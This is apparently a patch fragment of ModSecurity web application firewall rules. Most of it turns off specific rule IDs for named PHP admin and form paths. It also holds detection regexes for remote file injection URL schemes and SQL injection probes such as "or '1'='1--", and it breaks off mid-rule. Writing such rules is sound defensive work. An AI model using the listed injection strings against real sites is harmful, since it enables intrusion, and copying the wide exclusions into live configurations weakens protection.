+SecRule REQUEST_FILENAME "/paymentrecall\.php" "phase:2,id:92061,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/hostmeinadmin/clientshosting\.php" "phase:2,id:92062,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/processwire/page/edit" "phase:2,id:92063,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/general_settings\.php" "phase:2,id:92064,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/adclick\.php" "phase:2,id:92065,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin_edit_cat\.php" "phase:2,id:92066,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:92067,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92068,t:none,pass,nolog,skipAfter:END_RULES_92068"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336133,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92068
+
+SecRule REQUEST_FILENAME "/kontaktformular_web-plaaning\.php" "phase:2,id:92069,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/web-planning\.php" "phase:2,id:92070,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/shop/remote\.php" "phase:2,id:92071,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390703"
+SecAction "phase:2,id:92072,t:none,pass,nolog,skipAfter:END_RULES_92072"
+
+SecRule ARGS|XML:/*|!ARGS:/^products/ "(?:or.+1[[:space:]]*=[[:space:]]1|or 1=[0-9]|admin'(?: --| #)| or '1'='1--|having 1 ?= ?1 --|or\+1=[0-9]|null is null ?--|\b(\d+) ?(?:=|<>|<=>|!=) ?[1-3]\b)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,id:380572,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection probe',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_92072
+
+SecRule REQUEST_FILENAME "/beta_add_record\.php" "phase:2,id:92073,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/echeck_receipt\.php" "phase:2,id:92074,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/livehelp/send\.php" "phase:2,id:92075,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/tweets-grab-ldn\.php" "phase:2,id:92076,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92077,t:none,pass,nolog,skipAfter:END_RULES_92077"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:api "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336135,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:api "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92077
+
+SecRule REQUEST_FILENAME "/receipt\.php" "phase:2,id:92078,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92079,t:none,pass,nolog,skipAfter:END_RULES_92079"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/^list/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/img/|!ARGS:api|!ARGS:/uri/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336137,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/^list/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/img/|!ARGS:api|!ARGS:/uri/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336138,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92079
+
+SecRule REQUEST_FILENAME "/admin/contenu/modif/" "phase:2,id:92080,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/processproperty\.php" "phase:2,id:92081,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/newsletter/envoi\.php" "phase:2,id:92082,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/extplorer/index\.php" "phase:2,id:92083,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/administrator/functions/update_article\.ph" "phase:2,id:92084,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/functions/client\.php" "phase:2,id:92085,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+SecAction "phase:2,id:92086,t:none,pass,nolog,skipAfter:END_RULES_92086"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336139,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336140,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92086
+
+SecRule REQUEST_FILENAME "/op\.php" "phase:2,id:92087,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340195"
+
+SecRule REQUEST_FILENAME "/mod_raxo_allmode/tools/tb\.php" "phase:2,id:92088,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+SecAction "phase:2,id:92089,t:none,pass,nolog,skipAfter:END_RULES_92089"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336240,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92089
+
+SecRule REQUEST_FILENAME "/edit_offer\.php" "phase:2,id:92090,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/foto-graveren\.php" "phase:2,id:92091,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+SecAction "phase:2,id:92092,t:none,pass,nolog,skipAfter:END_RULES_92092"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/afbeelding/|!ARGS:/foto/|!ARGS:/Photo/|!ARGS:/image/|!ARGS:/img/|!ARGS:src|!ARGS:/^MA/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336242,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/afbeelding/|!ARGS:/foto/|!ARGS:/Photo/|!ARGS:/image/|!ARGS:/img/|!ARGS:src|!ARGS:/^MA/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336243,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92092
+
+SecRule REQUEST_FILENAME "/beta_new_update\.php" "phase:2,id:92093,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/webdav\.php" "phase:2,id:92094,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=392301"
+
+SecRule REQUEST_FILENAME "/sassistant/monitoring\.php" "phase:2,id:92095,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"
+SecAction "phase:2,id:92096,t:none,pass,nolog,skipAfter:END_RULES_92096"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/monitor/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336244,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/monitor/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336245,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92096
+
+SecRule REQUEST_FILENAME "/admin/printdeexpediat\.php" "phase:2,id:92097,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/shop/presta_admin/index\.php" "phase:2,id:92098,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/adduserplugin\.php" "phase:2,id:92099,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/edithtmlblob\.php" "phase:2,id:92100,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727"
+
+SecRule REQUEST_FILENAME "/video_admin/editvideo/" "phase:2,id:92101,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/administrator/functions/update_article\.php" "phase:2,id:92102,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/catalog/admbre/categories\.php" "phase:2,id:92103,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:92104,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727"
+
+SecRule REQUEST_FILENAME "/admin-edit\.php" "phase:2,id:92105,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/admin/producto\.php" "phase:2,id:92106,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/service/psnabe/clientsservices\.php" "phase:2,id:92107,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/wp-admin/options-permalink\.php" "phase:2,id:92108,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/ga\.php" "phase:2,id:92109,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/server_databases\.php" "phase:2,id:92110,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:92111,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:92112,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/support/agent/index\.php" "phase:2,id:92113,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/web-services/emailme\.php" "phase:2,id:92114,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/we_cmd\.php" "phase:2,id:92115,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/manage_news\.php" "phase:2,id:92116,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/admin/addersivu\.php" "phase:2,id:92117,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/vqgen/" "phase:2,id:92118,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/hallinta/kirjailija\.php" "phase:2,id:92119,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/json-api/cpanel" "phase:2,id:92120,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:92121,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "extplorer/index\.php" "phase:2,id:92122,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/wp-content/themes/oakland/theme/functions/upload\.php" "phase:2,id:92123,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/acp/vbshout\.php" "phase:2,id:92124,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/property\.php" "phase:2,id:92125,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92126,t:none,pass,nolog,skipAfter:END_RULES_92126"
+
+
+SecRule ARGS|!ARGS:id|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:pattern_select|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/^constant_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:junkWords|!ARGS:/foto/|!ARGS:/^attr_/|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:api|!ARGS:details|!ARGS:/^field/|!ARGS:profile_id|!ARGS:/^complete_action/|!ARGS:/^option_value/|!ARGS:/buzz/|!ARGS:cc_list_id|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:^/xcpr_/|!ARGS:back|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:catalogue_search_code|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:service|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:/^input_/|!ARGS:embed_code|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/